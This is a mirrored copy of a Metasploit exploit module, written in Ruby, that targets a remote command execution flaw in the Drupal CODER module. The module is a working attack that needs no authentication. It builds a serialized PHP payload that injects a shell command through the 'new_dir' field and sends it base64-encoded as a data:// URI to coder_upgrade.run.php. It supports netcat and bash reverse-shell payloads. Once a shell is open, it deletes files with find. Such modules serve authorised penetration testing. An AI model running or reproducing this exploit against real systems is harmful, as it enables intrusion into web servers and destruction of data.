Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/drupal_coder_exec.rb
19511 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Drupal CODER Module Remote Command Execution',
16
'Description' => %q{
17
This module exploits a Remote Command Execution vulnerability in the
18
Drupal CODER Module. Unauthenticated users can execute arbitrary
19
commands under the context of the web server user.
20
21
The CODER module doesn't sufficiently validate user inputs in a script
22
file that has the PHP extension. A malicious unauthenticated user can
23
make requests directly to this file to execute arbitrary commands.
24
The module does not need to be enabled for this to be exploited.
25
26
This module was tested against CODER 2.5 with Drupal 7.5 installed on
27
Ubuntu Server.
28
},
29
'License' => MSF_LICENSE,
30
'Author' => [
31
'Nicky Bloor <[email protected]>', # discovery
32
'Mehmet Ince <[email protected]>' # msf module
33
],
34
'References' => [
35
['URL', 'https://www.drupal.org/node/2765575']
36
],
37
'Privileged' => false,
38
'Payload' => {
39
'Space' => 250,
40
'DisableNops' => true,
41
'BadChars' => "\x2f",
42
'Compat' =>
43
{
44
'PayloadType' => 'cmd cmd_bash',
45
'RequiredCmd' => 'generic netcat netcat-e bash-tcp'
46
},
47
},
48
'Platform' => ['unix'],
49
'Arch' => ARCH_CMD,
50
'Targets' => [ ['Automatic', {}] ],
51
'DisclosureDate' => '2016-07-13',
52
'DefaultTarget' => 0,
53
'Notes' => {
54
'Reliability' => UNKNOWN_RELIABILITY,
55
'Stability' => UNKNOWN_STABILITY,
56
'SideEffects' => UNKNOWN_SIDE_EFFECTS
57
}
58
)
59
)
60
61
register_options(
62
[
63
OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
64
]
65
)
66
67
self.needs_cleanup = true
68
end
69
70
def check
71
res = send_request_cgi(
72
'method' => 'GET',
73
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php')
74
)
75
76
if res && res.body.include?('file parameter is not setNo path to parameter file')
77
Exploit::CheckCode::Appears
78
else
79
Exploit::CheckCode::Safe
80
end
81
end
82
83
def exploit
84
p = ''
85
p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
86
p << 's:11:"theme_cache";s:16:"theme_cache_test";'
87
p << 's:9:"variables";s:14:"variables_test";'
88
p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'
89
p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
90
p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
91
p << 's:7:"new_dir";s:'
92
p << (payload.encoded.length + 5).to_s
93
p << ':"-v;'
94
p << payload.encoded
95
p << ' #";s:4:"name";s:4:"test";}}}'
96
97
pl = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
98
99
send_request_cgi(
100
'method' => 'GET',
101
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
102
'encode_params' => false,
103
'vars_get' => {
104
'file' => pl
105
}
106
)
107
end
108
109
# XXX: FileDropper can't handle weird filenames
110
def on_new_session(session)
111
# This find command should be decently portable...
112
command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'
113
print_status("Cleaning up: #{command}")
114
session.shell_command_token(command)
115
end
116
end
117
118